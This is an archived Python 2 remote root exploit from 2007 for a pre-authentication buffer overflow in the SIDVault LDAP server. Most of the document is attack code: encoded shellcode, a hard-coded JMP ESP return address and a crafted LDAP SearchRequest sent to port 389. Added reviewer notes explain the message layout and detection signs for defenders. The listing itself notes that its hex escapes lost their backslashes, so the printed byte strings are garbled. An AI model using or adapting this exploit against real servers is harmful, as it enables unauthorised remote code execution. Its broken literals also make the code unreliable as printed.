# Title : SIDVault LDAP Server Preauth Remote Buffer Overflow Exploit
# Published : 2007-08-25
# Author : Joxean Koret
#!/usr/bin/python
"""
Alpha Centauri Software SIDVault LDAP Server remote root exploit (0days)

Reviewer notes (what the script below actually does, for defenders):

* It opens one TCP connection to port 389 of the host given as the first
  command-line argument and sends a single, unauthenticated LDAP message.
  Read with the intended hex escapes, that message is a SearchRequest
  (application tag 'c' = 0x63) whose baseObject DN is about 4 KB long:
  "dc=" followed by filler bytes, a 4-byte address and the payload.  No
  BindRequest is sent first, which is why the page calls it "preauth".
* The return address is hard-coded to 0xffffe777, described below as a
  JMP ESP in Ubuntu's linux-gate.so (the vDSO).  It is only meaningful on a
  system where that page sits at that fixed address; vDSO/stack
  randomization or a non-executable stack makes the hard-coded jump fail.
  (The "stack" part is inferred from JMP ESP; the page does not show the
  vulnerable code.)
* Detection: an LDAP SearchRequest arriving before any Bind whose
  baseObject is several kilobytes long and consists mostly of 0x90 bytes is
  not legitimate directory traffic.
* This listing is an extraction of the original: the backslashes of the hex
  escapes are missing, so as printed every string is plain ASCII text and
  the byte lengths discussed in the comments refer to the author's intent,
  not to what these literals evaluate to.
* Written for Python 2: a str is passed straight to socket.send().
"""
import sys
import socket
# Payload (shellcode) executed once control transfers to ESP.  Intended
# length is one byte per escape (~243 bytes); the exact length does not
# matter because the padding below is computed from len(sc).
sc = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
sc += "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
sc += "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
sc += "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
sc += "x56x58x34x5ax38x42x44x4ax4fx4dx41x33x4bx4dx43x35"
sc += "x43x44x43x45x4cx56x44x30x4cx46x48x56x4ax45x49x49"
sc += "x49x38x41x4ex4dx4cx42x58x48x59x43x44x44x55x48x36"
sc += "x4ax36x41x31x4ex35x48x46x43x35x49x58x41x4ex4cx56"
sc += "x48x56x4ax55x42x45x41x55x48x35x49x48x41x4ex4dx4c"
sc += "x42x48x42x4bx48x46x41x4dx43x4ex4dx4cx42x48x44x35"
sc += "x44x55x48x45x43x54x49x38x41x4ex42x4bx48x36x4dx4c"
sc += "x42x38x43x39x4cx46x44x30x49x55x42x4bx4fx43x4dx4c"
sc += "x42x38x49x54x49x47x49x4fx42x4bx4bx50x44x35x4ax46"
sc += "x4fx32x4fx42x43x57x4ax46x4ax36x4fx32x44x56x49x36"
sc += "x50x46x49x38x43x4ex44x45x43x35x49x58x41x4ex4dx4c"
sc += "x42x48x5a"
#
# The address we will use is 0xffffe777 (JMP ESP in Ubuntu's linux-gate.so)
#
# Little-endian encoding of 0xffffe777.  A single fixed address means the
# script is tied to one specific kernel/distribution layout; anything that
# moves the vDSO (ASLR of the vsyscall page) breaks it.
addr = "x77xe7xffxff"
# Overflow string: 2076 filler bytes up to the overwritten return address,
# the address itself, then filler and the payload.  The padding is sized so
# the total is always 2076 + 4 + 2019 = 4099 bytes, which the hard-coded BER
# lengths in the LDAP header below depend on.
theLine = 'x90'*2076 + addr+ 'x90'*(2019-len(sc)) + sc
# LDAP header, read with the intended escapes:
#   '0' \x82\x10/   SEQUENCE, length 0x102f          (LDAPMessage)
#   \x02\x01\x01    INTEGER 1                         (messageID)
#   'c' \x82\x10(   [APPLICATION 3], length 0x1028    (SearchRequest)
#   \x04\x82\x10\x06 OCTET STRING, length 0x1006      (baseObject)
#   'dc='           start of the DN; the remaining 4099 bytes are theLine
# 0x1006 = 4102 = len('dc=') + 4099, so the lengths are consistent only if
# theLine keeps its fixed size.
pkt = '0x82x10/x02x01x01cx82x10(x04x82x10x06dc='
pkt += theLine
# Rest of the SearchRequest (intended escapes): scope wholeSubtree (\n\x01\x02),
# derefAliases 0, sizeLimit 0, timeLimit 0, typesOnly FALSE, a "present"
# filter on objectClass (\x87\x0bobjectClass), and an empty attribute list
# ('0\x00').  These fields are only there to make the message well-formed.
pkt += 'nx01x02nx01x00x02x01x00x02x01x00x01x01x00x87x0bobjectClass0x00'
# Fire-and-forget: no socket timeout, no usage check (IndexError if the
# host argument is missing) and no response is read.  Connection failures
# surface as uncaught socket.error.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 389))
s.send(pkt)
s.close()